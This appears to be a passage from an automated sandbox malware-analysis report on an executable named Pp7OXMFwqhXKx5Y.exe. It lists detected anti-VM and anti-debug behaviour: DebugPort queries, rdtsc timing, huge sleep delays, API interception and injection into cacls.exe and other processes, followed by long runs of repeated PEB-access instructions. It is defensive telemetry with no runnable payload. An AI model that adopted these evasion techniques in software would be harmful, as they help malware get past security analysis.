                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Pp7OXMFwqhXKx5Y.exe PID: 5384, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeAPI/Special instruction interceptor: Address: 7FFAE146D144
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeAPI/Special instruction interceptor: Address: 7FFAE1470594
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeAPI/Special instruction interceptor: Address: 7FFAE146FF74
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeAPI/Special instruction interceptor: Address: 7FFAE146D6C4
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeAPI/Special instruction interceptor: Address: 7FFAE146D864
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeAPI/Special instruction interceptor: Address: 7FFAE146D004
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFAE146D144
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFAE1470594
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFAE146D764
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFAE146D324
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFAE146D364
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFAE146D004
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFAE146FF74
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFAE146D6C4
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFAE146D864
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFAE146D604
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeMemory allocated: 1930000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeMemory allocated: 3310000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeMemory allocated: 3110000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeMemory allocated: 7AA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeMemory allocated: 8AA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeMemory allocated: 8C30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeMemory allocated: 9C30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E1763 rdtsc 2_2_014E1763
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeWindow / User API: threadDelayed 9081Jump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeAPI coverage: 0.9 %
                Source: C:\Windows\SysWOW64\cacls.exeAPI coverage: 1.3 %
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe TID: 4452Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 2132Thread sleep count: 121 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 2132Thread sleep time: -242000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 2132Thread sleep count: 9081 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 2132Thread sleep time: -18162000s >= -30000sJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: firefox.exe, 00000005.00000002.179521144385.00000265A3AF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll__MP
                Source: RAVCpl64.exe, 00000003.00000002.183784710075.00000000004CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: cacls.exe, 00000004.00000002.182789173794.0000000003130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E1763 rdtsc 2_2_014E1763
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01573157 mov eax, dword ptr fs:[00000030h]2_2_01573157
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01573157 mov eax, dword ptr fs:[00000030h]2_2_01573157
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01573157 mov eax, dword ptr fs:[00000030h]2_2_01573157
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149A147 mov eax, dword ptr fs:[00000030h]2_2_0149A147
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149A147 mov eax, dword ptr fs:[00000030h]2_2_0149A147
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149A147 mov eax, dword ptr fs:[00000030h]2_2_0149A147
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D415F mov eax, dword ptr fs:[00000030h]2_2_014D415F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0153314A mov eax, dword ptr fs:[00000030h]2_2_0153314A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0153314A mov eax, dword ptr fs:[00000030h]2_2_0153314A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0153314A mov eax, dword ptr fs:[00000030h]2_2_0153314A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0153314A mov eax, dword ptr fs:[00000030h]2_2_0153314A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01575149 mov eax, dword ptr fs:[00000030h]2_2_01575149
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D716D mov eax, dword ptr fs:[00000030h]2_2_014D716D
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A6179 mov eax, dword ptr fs:[00000030h]2_2_014A6179
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014F717A mov eax, dword ptr fs:[00000030h]2_2_014F717A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014F717A mov eax, dword ptr fs:[00000030h]2_2_014F717A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C510F mov eax, dword ptr fs:[00000030h]2_2_014C510F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A510D mov eax, dword ptr fs:[00000030h]2_2_014A510D
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D0118 mov eax, dword ptr fs:[00000030h]2_2_014D0118
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F113 mov eax, dword ptr fs:[00000030h]2_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152A130 mov eax, dword ptr fs:[00000030h]2_2_0152A130
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D7128 mov eax, dword ptr fs:[00000030h]2_2_014D7128
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D7128 mov eax, dword ptr fs:[00000030h]2_2_014D7128
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155F13E mov eax, dword ptr fs:[00000030h]2_2_0155F13E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B01C0 mov eax, dword ptr fs:[00000030h]2_2_014B01C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B01C0 mov eax, dword ptr fs:[00000030h]2_2_014B01C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B51C0 mov eax, dword ptr fs:[00000030h]2_2_014B51C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B51C0 mov eax, dword ptr fs:[00000030h]2_2_014B51C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B51C0 mov eax, dword ptr fs:[00000030h]2_2_014B51C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B51C0 mov eax, dword ptr fs:[00000030h]2_2_014B51C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014981EB mov eax, dword ptr fs:[00000030h]2_2_014981EB
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AA1E3 mov eax, dword ptr fs:[00000030h]2_2_014AA1E3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AA1E3 mov eax, dword ptr fs:[00000030h]2_2_014AA1E3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AA1E3 mov eax, dword ptr fs:[00000030h]2_2_014AA1E3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AA1E3 mov eax, dword ptr fs:[00000030h]2_2_014AA1E3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AA1E3 mov eax, dword ptr fs:[00000030h]2_2_014AA1E3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CB1E0 mov eax, dword ptr fs:[00000030h]2_2_014CB1E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CB1E0 mov eax, dword ptr fs:[00000030h]2_2_014CB1E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CB1E0 mov eax, dword ptr fs:[00000030h]2_2_014CB1E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CB1E0 mov eax, dword ptr fs:[00000030h]2_2_014CB1E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CB1E0 mov eax, dword ptr fs:[00000030h]2_2_014CB1E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CB1E0 mov eax, dword ptr fs:[00000030h]2_2_014CB1E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CB1E0 mov eax, dword ptr fs:[00000030h]2_2_014CB1E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A91E5 mov eax, dword ptr fs:[00000030h]2_2_014A91E5
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A91E5 mov eax, dword ptr fs:[00000030h]2_2_014A91E5
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015681EE mov eax, dword ptr fs:[00000030h]2_2_015681EE
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015681EE mov eax, dword ptr fs:[00000030h]2_2_015681EE
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014991F0 mov eax, dword ptr fs:[00000030h]2_2_014991F0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014991F0 mov eax, dword ptr fs:[00000030h]2_2_014991F0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B01F1 mov eax, dword ptr fs:[00000030h]2_2_014B01F1
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B01F1 mov eax, dword ptr fs:[00000030h]2_2_014B01F1
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B01F1 mov eax, dword ptr fs:[00000030h]2_2_014B01F1
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CF1F0 mov eax, dword ptr fs:[00000030h]2_2_014CF1F0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CF1F0 mov eax, dword ptr fs:[00000030h]2_2_014CF1F0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A4180 mov eax, dword ptr fs:[00000030h]2_2_014A4180
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A4180 mov eax, dword ptr fs:[00000030h]2_2_014A4180
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A4180 mov eax, dword ptr fs:[00000030h]2_2_014A4180
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C9194 mov eax, dword ptr fs:[00000030h]2_2_014C9194
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E1190 mov eax, dword ptr fs:[00000030h]2_2_014E1190
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E1190 mov eax, dword ptr fs:[00000030h]2_2_014E1190
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015751B6 mov eax, dword ptr fs:[00000030h]2_2_015751B6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DE1A4 mov eax, dword ptr fs:[00000030h]2_2_014DE1A4
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DE1A4 mov eax, dword ptr fs:[00000030h]2_2_014DE1A4
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D31BE mov eax, dword ptr fs:[00000030h]2_2_014D31BE
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D31BE mov eax, dword ptr fs:[00000030h]2_2_014D31BE
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D41BB mov ecx, dword ptr fs:[00000030h]2_2_014D41BB
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D41BB mov eax, dword ptr fs:[00000030h]2_2_014D41BB
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D41BB mov eax, dword ptr fs:[00000030h]2_2_014D41BB
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D0044 mov eax, dword ptr fs:[00000030h]2_2_014D0044
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0157505B mov eax, dword ptr fs:[00000030h]2_2_0157505B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01526040 mov eax, dword ptr fs:[00000030h]2_2_01526040
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A1051 mov eax, dword ptr fs:[00000030h]2_2_014A1051
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A1051 mov eax, dword ptr fs:[00000030h]2_2_014A1051
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01549060 mov eax, dword ptr fs:[00000030h]2_2_01549060
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A7072 mov eax, dword ptr fs:[00000030h]2_2_014A7072
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A6074 mov eax, dword ptr fs:[00000030h]2_2_014A6074
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A6074 mov eax, dword ptr fs:[00000030h]2_2_014A6074
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A8009 mov eax, dword ptr fs:[00000030h]2_2_014A8009
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C5004 mov eax, dword ptr fs:[00000030h]2_2_014C5004
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C5004 mov ecx, dword ptr fs:[00000030h]2_2_014C5004
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2010 mov ecx, dword ptr fs:[00000030h]2_2_014E2010
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149D02D mov eax, dword ptr fs:[00000030h]2_2_0149D02D
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014BB0D0 mov eax, dword ptr fs:[00000030h]2_2_014BB0D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149B0D6 mov eax, dword ptr fs:[00000030h]2_2_0149B0D6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149B0D6 mov eax, dword ptr fs:[00000030h]2_2_0149B0D6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149B0D6 mov eax, dword ptr fs:[00000030h]2_2_0149B0D6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149B0D6 mov eax, dword ptr fs:[00000030h]2_2_0149B0D6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014990F8 mov eax, dword ptr fs:[00000030h]2_2_014990F8
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014990F8 mov eax, dword ptr fs:[00000030h]2_2_014990F8
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014990F8 mov eax, dword ptr fs:[00000030h]2_2_014990F8
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014990F8 mov eax, dword ptr fs:[00000030h]2_2_014990F8
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152C0E0 mov ecx, dword ptr fs:[00000030h]2_2_0152C0E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DD0F0 mov eax, dword ptr fs:[00000030h]2_2_014DD0F0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DD0F0 mov ecx, dword ptr fs:[00000030h]2_2_014DD0F0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149C0F6 mov eax, dword ptr fs:[00000030h]2_2_0149C0F6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01527090 mov eax, dword ptr fs:[00000030h]2_2_01527090
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01536090 mov eax, dword ptr fs:[00000030h]2_2_01536090
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01574080 mov eax, dword ptr fs:[00000030h]2_2_01574080
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01574080 mov eax, dword ptr fs:[00000030h]2_2_01574080
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01574080 mov eax, dword ptr fs:[00000030h]2_2_01574080
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01574080 mov eax, dword ptr fs:[00000030h]2_2_01574080
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01574080 mov eax, dword ptr fs:[00000030h]2_2_01574080
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01574080 mov eax, dword ptr fs:[00000030h]2_2_01574080
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01574080 mov eax, dword ptr fs:[00000030h]2_2_01574080
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149C090 mov eax, dword ptr fs:[00000030h]2_2_0149C090
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149A093 mov ecx, dword ptr fs:[00000030h]2_2_0149A093
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015750B7 mov eax, dword ptr fs:[00000030h]2_2_015750B7
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E00A5 mov eax, dword ptr fs:[00000030h]2_2_014E00A5
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F0A5 mov eax, dword ptr fs:[00000030h]2_2_0154F0A5
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F0A5 mov eax, dword ptr fs:[00000030h]2_2_0154F0A5
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F0A5 mov eax, dword ptr fs:[00000030h]2_2_0154F0A5
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F0A5 mov eax, dword ptr fs:[00000030h]2_2_0154F0A5
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F0A5 mov eax, dword ptr fs:[00000030h]2_2_0154F0A5
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F0A5 mov eax, dword ptr fs:[00000030h]2_2_0154F0A5
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F0A5 mov eax, dword ptr fs:[00000030h]2_2_0154F0A5
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015260A0 mov eax, dword ptr fs:[00000030h]2_2_015260A0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015260A0 mov eax, dword ptr fs:[00000030h]2_2_015260A0
